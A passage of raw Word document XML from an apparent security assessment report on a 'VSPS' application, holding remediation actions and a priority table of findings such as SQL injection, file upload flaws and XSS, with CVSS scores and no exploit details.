        <w:t>• Regulatory Non-Compliance and Financial Penalties: Failure to adhere to federal security standards like NIST CSF due to these widespread vulnerabilities could result in non-compliance findings and potential financial repercussions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550E94E9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
        </w:rPr>
        <w:t>Immediate Actions Required:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B739779" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Initiate emergency patching and apply compensating controls for all critical vulnerabilities, especially those related to arbitrary file uploads and SQL Injection, within 72 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C86B4DB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2. Conduct an urgent review and enhancement of authentication and authorization controls, particularly for sensitive actions, across the VSPS application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D4FC5E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3. Isolate the VSPS application or implement robust network segmentation and traffic filtering to mitigate immediate attack vectors while comprehensive remediation is underway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E26E93" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4. Develop a detailed remediation roadmap for all critical and high findings, assigning clear responsibilities and aggressive timelines for resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B8E1BC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5. Perform a thorough scan for malware or unauthorized files, particularly in directories susceptible to file upload vulnerabilities, and implement continuous monitoring for suspicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB8A517" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="400"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation Priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A23B3F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The following table lists findings ordered by remediation priority based on severity and exploitability.</w:t>
      </w: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883"/>
        <w:gridCol w:w="4445"/>
        <w:gridCol w:w="875"/>
        <w:gridCol w:w="615"/>
        <w:gridCol w:w="1198"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B7CCA" w14:paraId="31421E1D" w14:textId="77777777" w:rsidTr="00877518">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1044" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E293B"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FC7BC33" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E293B"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C8BC1FA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="485" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E293B"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="589D584E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="341" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E293B"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="275182ED" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="664" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E293B"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D1888B9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="5ECFD79C"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08A1095" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</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BAAF9FF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unrestricted Upload of File with Dangerous Ty...</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9458B9F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>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0A2064" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0</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B8956B2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IMMEDIATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4B42F60B"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68F59B4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</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4714D05" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Missing Authorization for Sensitive Action (E...</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9A4919C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>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972CA84" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.1</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3CFF050" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IMMEDIATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="77C0820C"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2E5DAB0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</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70371D9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unauthenticated Arbitrary File Upload (CVE-20...</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A33587D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>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ED69844" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8</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99C2EE8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IMMEDIATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="49606553"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F4A0BA8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</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6AE0B44" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SQL Injection - Time-Based Blind</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DF30460" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>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EFB9418" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8</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46D1F8E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IMMEDIATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="756F68BE"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21BF9B9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</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647D625" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Blind Cross-Site Scripting (XSS)</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CEF1C2A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>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C183F1E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.0</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93A1CCA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IMMEDIATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7F5C6DAA"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E12286D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6</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9A5AA8D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Missing Rate Limiting</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38CAB9A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>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6A01E9E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5</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7C36DE9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>URGENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6FFCB974"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7E813CA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7</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4BD7C4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unrestricted File Upload and Lack of Rate Lim...</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1A15A90" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>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61C106B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.0</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AEA500" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>URGENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1504E5EE"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D6389C8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8</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EA99432" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-Origin Resource Sharing (CORS) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Misconfi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...</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AA73A80" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>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7C0F8E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.5</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E6D5FE7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>URGENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7E9ACA74"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7F59A19" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9</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425AB98" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting (XSS)</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4349918" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>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0E21460" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.3</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C345481" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>URGENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7E7BC3BE" w14:textId="77777777" w:rsidTr="00877518">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="104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355B79C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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A718BB3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="48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1093C6D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>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A5FF8BD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="664"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ED64E03" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>URGENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D115D90" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment Matrix</w:t>
      </w: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802"/>
        <w:gridCol w:w="1442"/>
        <w:gridCol w:w="1443"/>
        <w:gridCol w:w="1443"/>
        <w:gridCol w:w="1443"/>
        <w:gridCol w:w="1443"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7F7EE789" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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E3F3BCC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Impact / Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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AE5DCE5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
